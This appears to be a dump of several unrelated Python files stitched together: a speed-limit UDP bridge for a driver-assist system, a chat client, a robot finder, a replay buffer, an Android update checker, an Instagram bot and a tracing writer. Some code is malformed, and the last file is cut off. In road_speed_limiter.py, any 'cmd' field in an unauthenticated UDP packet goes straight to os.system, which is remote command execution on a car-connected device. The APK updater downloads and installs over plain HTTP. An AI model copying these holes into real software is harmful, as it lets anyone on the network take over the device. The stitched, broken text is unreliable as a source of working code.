        wthread = threading.Thread(target=worker_main, args=(name,))
        wthread.start()
        wthreads.append(wthread)
    # Wait for some fevals to complete
    time.sleep(.5)
    # Main Loop
    batchsize = 20; numfevals = 0; maxfevals = 80
    while(numfevals < maxfevals):
        # Get new fevals
        offset = numworkers
        numfevals = len(server.controller.fevals)
        Xnew = np.zeros([numfevals-offset, 1])
        Ynew = np.zeros([numfevals-offset, 1])
        for k in range(len(server.controller.fevals)-offset):
            Ynew[k] = server.controller.fevals[k].value[0]
            Xnew[k] = server.controller.fevals[k].params[0]
        # Calculate GP and batch out new fevals
        m = calcGP(Xnew, Ynew)
        X = batchNewEvals_EI(m, bounds=1, batchsize=batchsize, fidelity=100)
        for k in X:
            tstrategy.eval([k])
        # Wait for some fevals to complete
        time.sleep(.5)
    # Plot and wait on controller and workers
    plotGP(m)
    cthread.join()
    for t in wthreads:
        t.join()
if __name__ == '__main__':
if len(sys.argv) > 1:
TIMEOUT = float(sys.argv[1])
main()
|
road_speed_limiter.py | import json
import os
import select
import threading
import time
import socket
import fcntl
import struct
from threading import Thread
from cereal import messaging
from common.params import Params
from common.numpy_fast import clip, mean
from common.realtime import sec_since_boot
from selfdrive.config import Conversions as CV
CAMERA_SPEED_FACTOR = 1.1
class Port:
    # UDP ports used to talk to the companion phone app.
    BROADCAST_PORT = 2899  # device -> app service-discovery beacons (and echo replies)
    RECEIVE_PORT = 2843    # app -> device road-limit data (bound in main())
    LOCATION_PORT = 2911   # device -> app GPS location stream (gps_thread)
class RoadLimitSpeedServer:
    """UDP bridge to a companion phone app that streams road speed-limit data.

    A daemon thread broadcasts a discovery beacon; udp_recv() (driven by
    main()) ingests JSON packets from the app under a lock.
    """

    def __init__(self):
        self.json_road_limit = None    # last 'road_limit' payload from the app
        self.active = 0
        self.last_updated = 0          # sec_since_boot of last road_limit packet
        self.last_updated_active = 0   # sec_since_boot of last 'active' packet
        self.last_exception = None
        self.lock = threading.Lock()   # guards json_road_limit
        self.remote_addr = None        # (ip, port) of the most recent app packet

        broadcast = Thread(target=self.broadcast_thread, args=[])
        broadcast.setDaemon(True)
        broadcast.start()

        # gps = Thread(target=self.gps_thread, args=[])
        # gps.setDaemon(True)
        # gps.start()

    def gps_thread(self):
        """Stream GPS fixes to the app over UDP (launch is commented out above)."""
        sm = messaging.SubMaster(['gpsLocationExternal'], poll=['gpsLocationExternal'])
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
            while True:
                try:
                    sm.update()
                    if self.remote_addr is not None and sm.updated['gpsLocationExternal']:
                        location = sm['gpsLocationExternal']
                        json_location = json.dumps([
                            location.latitude,
                            location.longitude,
                            location.altitude,
                            location.speed,
                            location.bearingDeg,
                            location.accuracy,
                            location.timestamp,
                            location.source,
                            location.vNED,
                            location.verticalAccuracy,
                            location.bearingAccuracyDeg,
                            location.speedAccuracy,
                        ])
                        address = (self.remote_addr[0], Port.LOCATION_PORT)
                        sock.sendto(json_location.encode(), address)
                    else:
                        time.sleep(1.)
                except Exception as e:
                    print("exception", e)
                    time.sleep(1.)

    def get_broadcast_address(self):
        """Return wlan0's IPv4 address via ioctl 0x8919, or None on failure."""
        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            ip = fcntl.ioctl(
                s.fileno(),
                0x8919,
                struct.pack('256s', 'wlan0'.encode('utf-8'))
            )[20:24]
            return socket.inet_ntoa(ip)
        except:
            return None

    def broadcast_thread(self):
        """Announce this device every 5 s so the app can discover it."""
        broadcast_address = None
        frame = 0
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
            try:
                sock.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
                while True:
                    try:
                        # Re-resolve every 10 beacons in case the network changed.
                        if broadcast_address is None or frame % 10 == 0:
                            broadcast_address = self.get_broadcast_address()
                        print('broadcast_address', broadcast_address)
                        if broadcast_address is not None:
                            address = (broadcast_address, Port.BROADCAST_PORT)
                            sock.sendto('EON:ROAD_LIMIT_SERVICE:v1'.encode(), address)
                    except:
                        pass
                    time.sleep(5.)
                    frame += 1
            except:
                pass

    def udp_recv(self, sock):
        """Poll `sock` for one app packet; returns True when one was handled."""
        ret = False
        try:
            ready = select.select([sock], [], [], 1.)
            ret = bool(ready[0])
            if ret:
                data, self.remote_addr = sock.recvfrom(2048)
                json_obj = json.loads(data.decode())

                if 'cmd' in json_obj:
                    # NOTE(review): executes an arbitrary shell command received
                    # over unauthenticated UDP — a serious security hole unless
                    # the network is fully trusted; confirm this is intended.
                    try:
                        os.system(json_obj['cmd'])
                    except:
                        pass

                if 'echo' in json_obj:
                    try:
                        echo = json.dumps(json_obj["echo"])
                        sock.sendto(echo.encode(), (self.remote_addr[0], Port.BROADCAST_PORT))
                    except:
                        pass

                try:
                    self.lock.acquire()
                    try:
                        if 'active' in json_obj:
                            self.active = json_obj['active']
                            self.last_updated_active = sec_since_boot()
                    except:
                        pass

                    if 'road_limit' in json_obj:
                        self.json_road_limit = json_obj['road_limit']
                        self.last_updated = sec_since_boot()
                finally:
                    self.lock.release()
        except:
            # Malformed/failed packet: drop any stale limit data.
            try:
                self.lock.acquire()
                self.json_road_limit = None
            finally:
                self.lock.release()

        return ret

    def check(self):
        """Expire stale data: limits after 20 s, the active flag after 10 s."""
        now = sec_since_boot()
        if now - self.last_updated > 20.:
            try:
                self.lock.acquire()
                self.json_road_limit = None
            finally:
                self.lock.release()

        if now - self.last_updated_active > 10.:
            self.active = 0

    def get_limit_val(self, key, default=None):
        """Look up `key` in the latest road_limit payload, else `default`."""
        try:
            if self.json_road_limit is None:
                return default

            if key in self.json_road_limit:
                return self.json_road_limit[key]
        except:
            pass
        return default
def main():
    """Receive app packets and republish them on the 'roadLimitSpeed' socket."""
    server = RoadLimitSpeedServer()
    roadLimitSpeed = messaging.pub_sock('roadLimitSpeed')

    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        try:
            try:
                # NOTE(review): 843 is a privileged port and differs from
                # Port.RECEIVE_PORT (2843); looks like a legacy port kept as
                # the first attempt — confirm.
                sock.bind(('0.0.0.0', 843))
            except:
                sock.bind(('0.0.0.0', Port.RECEIVE_PORT))

            sock.setblocking(False)

            while True:
                if server.udp_recv(sock):
                    # Republish the latest values for other daemons to consume.
                    dat = messaging.new_message()
                    dat.init('roadLimitSpeed')
                    dat.roadLimitSpeed.active = server.active
                    dat.roadLimitSpeed.roadLimitSpeed = server.get_limit_val("road_limit_speed", 0)
                    dat.roadLimitSpeed.isHighway = server.get_limit_val("is_highway", False)
                    dat.roadLimitSpeed.camType = server.get_limit_val("cam_type", 0)
                    dat.roadLimitSpeed.camLimitSpeedLeftDist = server.get_limit_val("cam_limit_speed_left_dist", 0)
                    dat.roadLimitSpeed.camLimitSpeed = server.get_limit_val("cam_limit_speed", 0)
                    dat.roadLimitSpeed.sectionLimitSpeed = server.get_limit_val("section_limit_speed", 0)
                    dat.roadLimitSpeed.sectionLeftDist = server.get_limit_val("section_left_dist", 0)
                    dat.roadLimitSpeed.camSpeedFactor = server.get_limit_val("cam_speed_factor", CAMERA_SPEED_FACTOR)
                    roadLimitSpeed.send(dat.to_bytes())

                server.check()
        except Exception as e:
            server.last_exception = e
class RoadSpeedLimiter:
    """Consumer side: reads 'roadLimitSpeed' messages and derives a max speed."""

    def __init__(self):
        self.slowing_down = False   # currently ramping down toward a camera limit
        self.started_dist = 0       # distance to camera when the ramp started
        self.longcontrol = Params().get_bool('LongControlEnabled')
        self.sock = messaging.sub_sock("roadLimitSpeed")
        self.roadLimitSpeed = None  # last received message, if any

    def recv(self):
        """Non-blocking poll for the newest roadLimitSpeed message."""
        try:
            dat = messaging.recv_sock(self.sock, wait=False)
            if dat is not None:
                self.roadLimitSpeed = dat.roadLimitSpeed
        except:
            pass

    def get_active(self):
        """Return the app's 'active' flag (0 when no data received yet)."""
        self.recv()
        if self.roadLimitSpeed is not None:
            return self.roadLimitSpeed.active
        return 0

    def get_max_speed(self, cluster_speed, is_metric):
        """Compute a target max speed from camera/section limit data.

        Args:
            cluster_speed: displayed speed (kph or mph per is_metric).
            is_metric: True when cluster_speed is in kph.

        Returns:
            (max_speed, limit, left_dist, first_started, log) where max_speed
            is 0 when no limit applies.
        """
        log = ""
        self.recv()

        if self.roadLimitSpeed is None:
            return 0, 0, 0, False, ""

        try:
            road_limit_speed = self.roadLimitSpeed.roadLimitSpeed
            is_highway = self.roadLimitSpeed.isHighway
            cam_type = int(self.roadLimitSpeed.camType)

            cam_limit_speed_left_dist = self.roadLimitSpeed.camLimitSpeedLeftDist
            cam_limit_speed = self.roadLimitSpeed.camLimitSpeed

            section_limit_speed = self.roadLimitSpeed.sectionLimitSpeed
            section_left_dist = self.roadLimitSpeed.sectionLeftDist

            camSpeedFactor = clip(self.roadLimitSpeed.camSpeedFactor, 1.0, 1.1)

            # Plausibility bounds for a reported limit, by road class.
            if is_highway is not None:
                if is_highway:
                    MIN_LIMIT = 40
                    MAX_LIMIT = 120
                else:
                    MIN_LIMIT = 30
                    MAX_LIMIT = 100
            else:
                MIN_LIMIT = 30
                MAX_LIMIT = 120

            if cam_limit_speed_left_dist is not None and cam_limit_speed is not None and cam_limit_speed_left_dist > 0:
                v_ego = cluster_speed * (CV.KPH_TO_MS if is_metric else CV.MPH_TO_MS)
                diff_speed = cluster_speed - (cam_limit_speed * camSpeedFactor)
                #cam_limit_speed_ms = cam_limit_speed * (CV.KPH_TO_MS if is_metric else CV.MPH_TO_MS)

                # Start slowing ~30 s out; aim to reach the limit ~6 s out.
                starting_dist = v_ego * 30.
                safe_dist = v_ego * 6.

                if MIN_LIMIT <= cam_limit_speed <= MAX_LIMIT and (self.slowing_down or cam_limit_speed_left_dist < starting_dist):
                    if not self.slowing_down:
                        self.started_dist = cam_limit_speed_left_dist
                        self.slowing_down = True
                        first_started = True
                    else:
                        first_started = False

                    td = self.started_dist - safe_dist
                    d = cam_limit_speed_left_dist - safe_dist

                    # pp in [0, 1]: fraction of the speed gap still allowed.
                    if d > 0. and td > 0. and diff_speed > 0. and (section_left_dist is None or section_left_dist < 10):
                        pp = (d / td) ** 0.6
                    else:
                        pp = 0

                    return cam_limit_speed * camSpeedFactor + int(pp * diff_speed), \
                        cam_limit_speed, cam_limit_speed_left_dist, first_started, log

                self.slowing_down = False
                return 0, cam_limit_speed, cam_limit_speed_left_dist, False, log

            elif section_left_dist is not None and section_limit_speed is not None and section_left_dist > 0:
                if MIN_LIMIT <= section_limit_speed <= MAX_LIMIT:
                    if not self.slowing_down:
                        self.slowing_down = True
                        first_started = True
                    else:
                        first_started = False

                    return section_limit_speed * camSpeedFactor, section_limit_speed, section_left_dist, first_started, log

                self.slowing_down = False
                return 0, section_limit_speed, section_left_dist, False, log

        except Exception as e:
            log = "Ex: " + str(e)
            pass

        self.slowing_down = False
        return 0, 0, 0, False, log
# Process-wide singleton; always access it through get_road_speed_limiter().
road_speed_limiter = None


def road_speed_limiter_get_active():
    """Return the limiter's active flag, lazily creating the singleton.

    Delegates to get_road_speed_limiter() instead of duplicating the
    lazy-initialization logic (previously repeated in three places).
    """
    return get_road_speed_limiter().get_active()
def road_speed_limiter_get_max_speed(cluster_speed, is_metric):
    """Return the (max_speed, limit, left_dist, first_started, log) tuple
    from the process-wide RoadSpeedLimiter, lazily creating it.

    Delegates to get_road_speed_limiter() instead of duplicating the
    lazy-initialization logic.
    """
    return get_road_speed_limiter().get_max_speed(cluster_speed, is_metric)
def get_road_speed_limiter():
    """Return the process-wide RoadSpeedLimiter, creating it on first use."""
    global road_speed_limiter
    limiter = road_speed_limiter
    if limiter is None:
        limiter = RoadSpeedLimiter()
        road_speed_limiter = limiter
    return limiter
if __name__ == "__main__":
    # Script entry point; main() is presumably defined earlier in this file.
    main()
|
client.py | import socket
import threading
HOST = "127.0.0.1"
PORT = 5052
ENCODING = "ascii"
def handle_send(sock: socket.socket):
    """Read lines from stdin and send them over *sock* until input ends
    or the connection breaks.

    Fix: the original bare ``except:`` swallowed every exception,
    including KeyboardInterrupt; catch only end-of-input and socket
    errors, and close the socket in ``finally`` so it is released on any
    exit path.
    """
    try:
        while True:
            num1 = input()
            sock.send(num1.encode(ENCODING))
    except (EOFError, OSError):
        # stdin closed or connection broken — stop sending.
        pass
    finally:
        sock.close()
def handle_receive(sock: socket.socket):
    """Print everything received on *sock* until the connection breaks.

    Fix: replace the bare ``except:`` (which hid every error, including
    KeyboardInterrupt) with OSError handling, and close the socket in
    ``finally`` so it is released on any exit path.
    """
    try:
        while True:
            print(sock.recv(1024).decode(ENCODING))
    except OSError:
        # Connection closed or reset — stop receiving.
        pass
    finally:
        sock.close()
if __name__ == '__main__':
    # Connect to the server at HOST:PORT and run the send and receive
    # loops on separate threads so typing and printing don't block each other.
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    t_send = threading.Thread(target=handle_send, args=(s,))
    t_receive = threading.Thread(target=handle_receive, args=(s,))
    t_send.start()
    t_receive.start()
|
robotfinder.py | import logging
import socket
import threading
from robotpy_installer.utils import _resolve_addr
logger = logging.getLogger("robotpy.installer")
class RobotFinder:
    """Probe several candidate addresses in parallel and return the first
    one that succeeds, assuming that is the robot."""

    def __init__(self, *addrs):
        """
        :param addrs: (address, resolve) pairs. resolve=True means
            "DNS-resolve the name"; resolve=False means "try opening an
            SSH (port 22) connection".
        """
        self.tried = 0
        self.answer = None
        self.addrs = addrs
        self.cond = threading.Condition()

    def find(self):
        """Return the first reachable address, or None if all probes fail.

        Blocks until one probe succeeds or every probe has finished.
        """
        with self.cond:
            self.tried = 0
            for addr, resolve in self.addrs:
                t = threading.Thread(target=self._try_server, args=(addr, resolve))
                # Daemon threads: don't keep the process alive for slow probes.
                # (Thread.setDaemon() is deprecated since Python 3.10.)
                t.daemon = True
                t.start()
            while self.answer is None and self.tried != len(self.addrs):
                self.cond.wait()
            if self.answer:
                logger.info("-> Robot is at %s", self.answer)
            return self.answer

    def _try_server(self, addr, resolve):
        """Worker: probe one address and record the first success."""
        success = False
        try:
            if resolve:
                addr = _resolve_addr(addr)
            else:
                sd = socket.create_connection((addr, 22), timeout=10)
                sd.close()
            # Mark success for both probe styles: a resolve that didn't
            # raise, or a connection that opened.
            success = True
        except Exception:
            pass
        with self.cond:
            self.tried += 1
            if success and not self.answer:
                self.answer = addr
            self.cond.notify_all()
|
replay.py | from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
from builtins import zip
from builtins import str
from builtins import object
# Copyright 2018 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import numpy as np
import pickle
import multiprocessing
class ReplayBuffer(object):
    """
    Stores frames sampled from the environment, with the ability to sample a batch
    for training.
    """

    def __init__(self, max_size, obs_dim, action_dim, roundrobin=True):
        """
        :param max_size: capacity of the buffer.
        :param obs_dim: flat observation dimensionality.
        :param action_dim: flat action dimensionality.
        :param roundrobin: when full, overwrite oldest-first (True) or a
            random slot (False).
        """
        self.max_size = max_size
        self.obs_dim = obs_dim
        self.action_dim = action_dim
        self.roundrobin = roundrobin
        self.obs_buffer = np.zeros([max_size, obs_dim])
        self.next_obs_buffer = np.zeros([max_size, obs_dim])
        self.action_buffer = np.zeros([max_size, action_dim])
        self.reward_buffer = np.zeros([max_size])
        self.done_buffer = np.zeros([max_size])
        # Total number of transitions ever added (can exceed max_size).
        self.count = 0

    def random_batch(self, batch_size):
        """Sample *batch_size* transitions uniformly (with replacement).

        Returns (obs, next_obs, actions, rewards, dones, count).
        """
        indices = np.random.randint(0, min(self.count, self.max_size), batch_size)
        return (
            self.obs_buffer[indices],
            self.next_obs_buffer[indices],
            self.action_buffer[indices],
            self.reward_buffer[indices],
            self.done_buffer[indices],
            self.count
        )

    def add_replay(self, obs, next_obs, action, reward, done):
        """Insert one transition, overwriting per the roundrobin policy once full."""
        if self.count >= self.max_size:
            if self.roundrobin:
                index = self.count % self.max_size
            else:
                index = np.random.randint(0, self.max_size)
        else:
            index = self.count
        self.obs_buffer[index] = obs
        self.next_obs_buffer[index] = next_obs
        self.action_buffer[index] = action
        self.reward_buffer[index] = reward
        self.done_buffer[index] = done
        self.count += 1

    def save(self, path, name):
        """Asynchronously pickle the buffers to ``path/name.*.npz`` files."""
        def _save(datas, fnames):
            print("saving replay buffer...")
            for data, fname in zip(datas, fnames):
                # BUG FIX: pickle requires a binary-mode file; text mode ("w")
                # raises TypeError on Python 3.
                with open("%s.npz" % fname, "wb") as f:
                    pickle.dump(data, f)
            with open("%s/%s.count" % (path, name), "w") as f:
                f.write(str(self.count))
            print("...done saving.")

        datas = [
            self.obs_buffer,
            self.next_obs_buffer,
            self.action_buffer,
            self.reward_buffer,
            self.done_buffer
        ]
        fnames = [
            "%s/%s.obs_buffer" % (path, name),
            "%s/%s.next_obs_buffer" % (path, name),
            "%s/%s.action_buffer" % (path, name),
            "%s/%s.reward_buffer" % (path, name),
            "%s/%s.done_buffer" % (path, name)
        ]
        # Saving can be slow for large buffers; do it in a child process.
        proc = multiprocessing.Process(target=_save, args=(datas, fnames))
        proc.start()

    def load(self, path, name):
        """Restore buffers previously written by save()."""
        print("Loading %s replay buffer (may take a while...)" % name)
        # BUG FIX: files contain pickled bytes, so they must be opened "rb";
        # the default text mode fails with UnicodeDecodeError/TypeError.
        with open("%s/%s.obs_buffer.npz" % (path, name), "rb") as f:
            self.obs_buffer = pickle.load(f)
        with open("%s/%s.next_obs_buffer.npz" % (path, name), "rb") as f:
            self.next_obs_buffer = pickle.load(f)
        with open("%s/%s.action_buffer.npz" % (path, name), "rb") as f:
            self.action_buffer = pickle.load(f)
        with open("%s/%s.reward_buffer.npz" % (path, name), "rb") as f:
            self.reward_buffer = pickle.load(f)
        with open("%s/%s.done_buffer.npz" % (path, name), "rb") as f:
            self.done_buffer = pickle.load(f)
        with open("%s/%s.count" % (path, name), "r") as f:
            self.count = int(f.read())
|
check_update.py | import kivy
kivy.require('1.0.9')
from kivy.lang import Builder
from kivy.uix.gridlayout import GridLayout
from kivy.uix.popup import Popup
from kivy.properties import *
from kivy.uix.progressbar import ProgressBar
from kivy.clock import Clock
from jnius import autoclass, cast
import urllib.request, urllib.parse, urllib.error
import json
import os
import threading
import re
from . import main_utils
__all__ = ["check_update"]
Builder.load_string('''
<ConfirmPopup>:
cols:1
Label:
text: root.text
size_hint_y: 16
GridLayout:
cols: 2
size_hint_y: None
height: '44sp'
Button:
text: 'Yes'
on_release: root.dispatch('on_answer','yes')
Button:
text: 'No'
on_release: root.dispatch('on_answer', 'no')
''')
cur_activity = cast("android.app.Activity", autoclass(
"org.kivy.android.PythonActivity").mActivity)
apk_url = ""
popup = None
class ConfirmPopup(GridLayout):
    """Yes/No confirmation dialog body; dispatches 'on_answer' with the choice."""
    # Message shown by the Label in the kv rule loaded above.
    text = StringProperty()

    def __init__(self, **kwargs):
        # Register the custom event before the base class processes kwargs.
        self.register_event_type('on_answer')
        super(ConfirmPopup, self).__init__(**kwargs)

    def on_answer(self, *args):
        # Default no-op handler; callers bind to 'on_answer' instead.
        pass
def get_cache_dir():
    """Return the app's Android cache directory as a string path."""
    return str(cur_activity.getCacheDir().getAbsolutePath())
def get_cur_version():
    """
    Get current apk version string.

    Queries Android's PackageManager for this app's versionName.
    """
    pkg_name = cur_activity.getPackageName()
    return str(
        cur_activity.getPackageManager().getPackageInfo(
            pkg_name, 0).versionName)
def cmp_version(version1, version2):
    '''
    Compare two version numbers

    :param version1: version number 1
    :type version1: string
    :param version2: version number 2
    :type version2: string
    :returns: 0 if version1==version2, 1 if version1>version2, -1 if version1<version2
    '''
    def normalize(v):
        # Drop trailing ".0" components so "1.2" compares equal to "1.2.0".
        return [int(x) for x in re.sub(r'(\.0+)*$', '', v).split(".")]
    n1 = normalize(version1)
    n2 = normalize(version2)
    # BUG FIX: the builtin cmp() was removed in Python 3 (this module already
    # uses urllib.request, i.e. Python 3); emulate it with rich comparisons.
    return (n1 > n2) - (n1 < n2)
def install_apk(apk_path):
    """Hand the downloaded APK to Android's package installer via an intent."""
    IntentClass = autoclass("android.content.Intent")
    FileClass = autoclass("java.io.File")
    Uri = autoclass('android.net.Uri')
    f = FileClass(apk_path)
    if not f.exists():
        # Nothing to install (the download may have failed).
        return
    intent = IntentClass()
    intent.setAction(IntentClass.ACTION_VIEW)
    # intent.setDataAndType(Uri.fromFile(f), "application/vnd.android.package-archive")
    intent.setDataAndType(
        Uri.parse(
            "file://" +
            f.toString()),
        "application/vnd.android.package-archive")
    cur_activity.startActivity(intent)
def download_thread(apk_url, apk_path):
    """Worker thread: fetch the APK, then launch the installer."""
    try:
        urllib.request.urlretrieve(apk_url, apk_path)
        install_apk(apk_path)
    finally:
        # Presumably releases this thread's JVM attachment — see main_utils.
        main_utils.detach_thread()
def download_apk(instance, answer):
    """'on_answer' handler: if the user accepted, download the APK in the
    background and show a progress popup; always dismiss the confirm popup."""
    global popup
    if answer == "yes":
        global apk_url
        apk_path = os.path.join(
            main_utils.get_mobileinsight_path(),
            "update.apk")
        # Remove a stale APK from a previous update attempt.
        if os.path.isfile(apk_path):
            os.remove(apk_path)
        t = threading.Thread(target=download_thread, args=(apk_url, apk_path))
        t.start()
        progress_bar = ProgressBar()
        progress_bar.value = 1

        def download_progress(instance):
            # NOTE(review): the bar advances on a timer, not actual download
            # progress — it is purely cosmetic.
            def next_update(dt):
                if progress_bar.value >= 100:
                    return False
                progress_bar.value += 1
            Clock.schedule_interval(next_update, 1 / 25)

        progress_popup = Popup(
            title='Downloading MobileInsight...',
            content=progress_bar
        )
        progress_popup.bind(on_open=download_progress)
        progress_popup.open()
    popup.dismiss()
def check_update():
    """
    Check whether a newer APK is published and prompt the user to update.

    Downloads update metadata JSON, compares its "Version" to the installed
    version, and opens a confirmation popup when an update is available.

    Fixes: guard against metadata missing the "URL"/"Description" keys
    (previously a KeyError), and close the metadata file handle explicitly.
    """
    global apk_url
    # update_meta_url = "http://metro.cs.ucla.edu/mobile_insight/update_meta.json"
    update_meta_url = "http://mobileinsight.net/update_meta.json"
    update_meta_path = os.path.join(get_cache_dir(), "update_meta.json")
    if os.path.isfile(update_meta_path):
        os.remove(update_meta_path)
    # retrieve latest metadata
    try:
        urllib.request.urlretrieve(update_meta_url, update_meta_path)
    except Exception as e:
        print("Connection failure: stop checking update")
        return
    if not os.path.isfile(update_meta_path):
        return
    with open(update_meta_path) as f:
        raw_data = f.read()
    update_meta = json.loads(raw_data)
    # Malformed metadata: bail out instead of raising KeyError below.
    if "Version" not in update_meta or "URL" not in update_meta:
        return
    cur_version = get_cur_version()
    apk_url = update_meta["URL"]
    if cmp_version(cur_version, update_meta['Version']) < 0:
        global popup
        content = ConfirmPopup(text='New updates in v' + update_meta["Version"]
                               + ':\n ' + update_meta.get("Description", "")
                               + 'Would you like to update?')
        content.bind(on_answer=download_apk)
        popup = Popup(title='New update is available',
                      content=content,
                      size_hint=(None, None),
                      size=(1000, 800),
                      auto_dismiss=False)
        popup.open()
|
__main__.py | import os
import sys
import time
import requests
import threading
from InstagramAPI import InstagramAPI
InstagramAPI = InstagramAPI(sys.argv[1], sys.argv[2])
tmp_path = os.path.dirname(os.path.realpath(__file__)) + '/tmp'
def main(argv):
    """Log in to Instagram and launch the background upload loop."""
    InstagramAPI.login()
    threading.Thread(target=start).start()
def start():
    """Forever: download a random cat picture and post it to Instagram,
    then sleep one hour.

    Fixes: the original bare ``except: pass`` hid every error (including
    KeyboardInterrupt) and retried immediately, hot-spinning the API on
    persistent failure; the downloaded file handle was never closed.
    """
    while True:
        try:
            r = requests.get('http://aws.random.cat/meow')
            file_addr = r.json()["file"]
            file = requests.get(file_addr)
            extension = file_addr[file_addr.rfind('.'):]
            file_path = os.path.normpath(tmp_path + '/cat' + str(int(time.time())) + extension)
            if not os.path.exists(tmp_path):
                os.makedirs(tmp_path)
            print("\nDownloading " + file_addr)
            with open(file_path, 'wb') as f:
                f.write(file.content)
            print("Uploading it")
            InstagramAPI.uploadPhoto(file_path)
            os.remove(file_path)
            time.sleep(1 * 60 * 60)
        except Exception:
            # Back off briefly so a persistent failure doesn't hammer the APIs.
            time.sleep(60)
if __name__ == '__main__':
    # argv[1]/argv[2] are the Instagram username/password (consumed at import
    # time by the InstagramAPI constructor above).
    main(sys.argv)
writer.py | # stdlib
import atexit
import threading
import random
import os
import time
from . import api
from .internal.logger import get_logger
log = get_logger(__name__)
MAX_TRACES = 1000
DEFAULT_TIMEOUT = 5
LOG_ERR_INTERVAL = 60
class AgentWriter(object):
    """Buffers finished traces and ships them to a local agent through a
    background worker thread."""

    def __init__(self, hostname='localhost', port=8126, filters=None, priority_sampler=None):
        self._pid = None
        self._traces = None
        self._worker = None
        self._filters = filters
        self._priority_sampler = priority_sampler
        self.api = api.API(
            hostname, port, priority_sampling=priority_sampler is not None
        )

    def write(self, spans=None, services=None):
        """Enqueue a finished trace for asynchronous delivery."""
        # Recreate queue/worker if we were forked since the last write.
        self._reset_worker()
        if spans:
            self._traces.add(spans)

    def _reset_worker(self):
        """Ensure the queue and flush thread belong to the current process."""
        pid = os.getpid()
        if pid != self._pid:
            # Forked (or first use): queues from the parent are unusable here.
            log.debug("resetting queues. pids(old:%s new:%s)", self._pid, pid)
            self._traces = Q(max_size=MAX_TRACES)
            self._worker = None
            self._pid = pid
        worker = self._worker
        if worker is None or not worker.is_alive():
            self._worker = AsyncWorker(
                self.api,
                self._traces,
                filters=self._filters,
                priority_sampler=self._priority_sampler,
            )
class AsyncWorker(object):
    """Background thread that drains a trace queue, filters the traces and
    sends them to the agent API."""

    def __init__(self, api, trace_queue, service_queue=None, shutdown_timeout=DEFAULT_TIMEOUT,
                 filters=None, priority_sampler=None):
        """
        :param api: transport object exposing send_traces().
        :param trace_queue: Q instance the writer pushes traces into.
        :param service_queue: unused, kept for interface compatibility.
        :param shutdown_timeout: seconds to wait for a final flush at exit.
        :param filters: optional trace filters applied before sending.
        :param priority_sampler: sampler updated from agent responses.
        """
        self._trace_queue = trace_queue
        self._lock = threading.Lock()
        self._thread = None
        self._shutdown_timeout = shutdown_timeout
        self._filters = filters
        self._priority_sampler = priority_sampler
        self._last_error_ts = 0
        self.api = api
        self.start()

    def is_alive(self):
        return self._thread.is_alive()

    def start(self):
        """Start the flush thread (idempotent) and register an atexit flush."""
        with self._lock:
            if not self._thread:
                log.debug("starting flush thread")
                self._thread = threading.Thread(target=self._target)
                # FIX: Thread.setDaemon() is deprecated since Python 3.10;
                # assign the daemon attribute instead (same behavior).
                self._thread.daemon = True
                self._thread.start()
                atexit.register(self._on_shutdown)

    def stop(self):
        """
        Close the trace queue so that the worker will stop the execution
        """
        with self._lock:
            if self._thread and self.is_alive():
                self._trace_queue.close()

    def join(self, timeout=2):
        """
        Wait for the AsyncWorker execution. This call doesn't block the execution
        and it has a 2 seconds of timeout by default.
        """
        self._thread.join(timeout)

    def _on_shutdown(self):
        """atexit hook: give in-flight traces a bounded chance to be sent."""
        with self._lock:
            if not self._thread:
                return
            # wait for in-flight queues to get traced.
            time.sleep(0.1)
            self._trace_queue.close()
            size = self._trace_queue.size()
            if size:
                key = "ctrl-break" if os.name == 'nt' else 'ctrl-c'
                log.debug(
                    "Waiting %ss for traces to be sent. Hit %s to quit.",
                    self._shutdown_timeout,
                    key,
                )
                timeout = time.time() + self._shutdown_timeout
                while time.time() < timeout and self._trace_queue.size():
                    # FIXME[matt] replace with a queue join
                    time.sleep(0.05)

    def _target(self):
        """Flush loop: pop, filter, send, update sampler, repeat."""
        traces_response = None
        while True:
            traces = self._trace_queue.pop()
            if traces:
                # Before sending the traces, make them go through the
                # filters
                try:
                    traces = self._apply_filters(traces)
                except Exception as err:
                    log.error("error while filtering traces:{0}".format(err))
                if traces:
                    # If we have data, let's try to send it.
                    try:
                        traces_response = self.api.send_traces(traces)
                    except Exception as err:
                        log.error("cannot send spans to {1}:{2}: {0}".format(err, self.api.hostname, self.api.port))
            if self._trace_queue.closed() and self._trace_queue.size() == 0:
                # no traces and the queue is closed. our work is done
                return
            if self._priority_sampler and traces_response:
                # Agent responses carry per-service sample rates.
                result_traces_json = traces_response.get_json()
                if result_traces_json and 'rate_by_service' in result_traces_json:
                    self._priority_sampler.set_sample_rate_by_service(result_traces_json['rate_by_service'])
            self._log_error_status(traces_response, "traces")
            traces_response = None
            time.sleep(1)  # replace with a blocking pop.

    def _log_error_status(self, response, response_name):
        """Log HTTP failures, rate-limited to one error per LOG_ERR_INTERVAL."""
        if not isinstance(response, api.Response):
            return
        log_level = log.debug
        if response.status >= 400:
            now = time.time()
            if now > self._last_error_ts + LOG_ERR_INTERVAL:
                log_level = log.error
                self._last_error_ts = now
            log_level(
                'failed_to_send %s to Datadog Agent: HTTP error status %s, reason %s, message %s',
                response_name,
                response.status,
                response.reason,
                response.msg,
            )

    def _apply_filters(self, traces):
        """
        Here we make each trace go through the filters configured in the
        tracer. There is no need for a lock since the traces are owned by the
        AsyncWorker at that point.
        """
        if self._filters is not None:
            filtered_traces = []
            for trace in traces:
                for filtr in self._filters:
                    trace = filtr.process_trace(trace)
                    if trace is None:
                        break
                if trace is not None:
                    filtered_traces.append(trace)
            return filtered_traces
        return traces
class Q(object):
    """
    Thread-safe queue that pops all of its items at once. When full it
    overwrites a random element, and once closed it rejects further adds.
    """

    def __init__(self, max_size=1000):
        self._things = []
        self._lock = threading.Lock()
        self._max_size = max_size
